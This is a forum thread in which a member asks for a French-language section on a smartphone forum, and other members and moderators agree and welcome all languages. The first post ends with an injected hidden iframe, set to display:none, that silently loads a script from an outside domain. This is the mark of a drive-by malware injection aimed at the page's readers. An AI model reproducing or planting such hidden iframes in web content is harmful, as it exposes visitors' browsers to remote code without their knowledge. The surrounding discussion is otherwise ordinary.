+ Reply to Thread

Thread: French section

French section

Hi,

May i suggest to creat a French section for this Awsome Forum.
    many poeple who i told about this Url would like to participate but they only can read and type in french and i'm sure than those french poeples who are living in europe could helps us alot on those products because it's aviable there since a few months before America.

Thanks
    Dany
    ( p.s. Sorry for my bad english, my first language is french.)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

People are using Kyocera smartphones in Europe??
    Please visit my picture site: Robert-O-Rama :)

Putting the retard comment aside...

I think that a Non- English section might be a good idea. For anyone to post questions and answers in any language. I don't think we could make a forum for each language, but one that people would feel free to speak whatever they wish is definately possible.

What do you think?
    -=Jimmyjoe=-

Yes that could be useful for the most of nonenglish speaker around the world..

And if you need help for the French section, i could make my part.

I'm using this Forum as Unregistred user since a few months and i'm adicted to this Forum and his Producs now... hehehe

See i will have my 7135 soon..

Originally posted by Danzer
    I'm using this Forum as Unregistred user since a few months and i'm adicted to this Forum and his Producs now... hehehe

See i will have my 7135 soon..
    Cool! Welcome to the board! (as a member)

Originally posted by jimmyjoe
    Putting the retard comment aside...

I think that a Non- English section might be a good idea. For anyone to post questions and answers in any language. I don't think we could make a forum for each language, but one that people would feel free to speak whatever they wish is definately possible.

What do you think?
    Great idea. It would add to the prestigue of the forum to have an "international" section! Go for it!
    Dave

Administrator
    its cool to see one piece of technology bring two different cultures together...

I think it is an excellent idea to have other languages here. And please do not take any offense from the idiot whose post may or not still be in this thread. He only speaks for himself, and not any of the rest of us. All cultures are welcomed here with open arms.
    ~'kito
    pdaPhoneHome Moderator

Yep... all cultures and languages are welcome! (how do we moderate that board? ). Is there a vBulletin plug-in to translate languages automatically maybe?

Administrator
    Originally posted by Markito
    I think it is an excellent idea to have other languages here. And please do not take any offense from the idiot whose post may or not still be in this thread. He only speaks for himself, and not any of the rest of us. All cultures are welcomed here with open arms.
    i second that...

FYI, offending posts have been dealt with.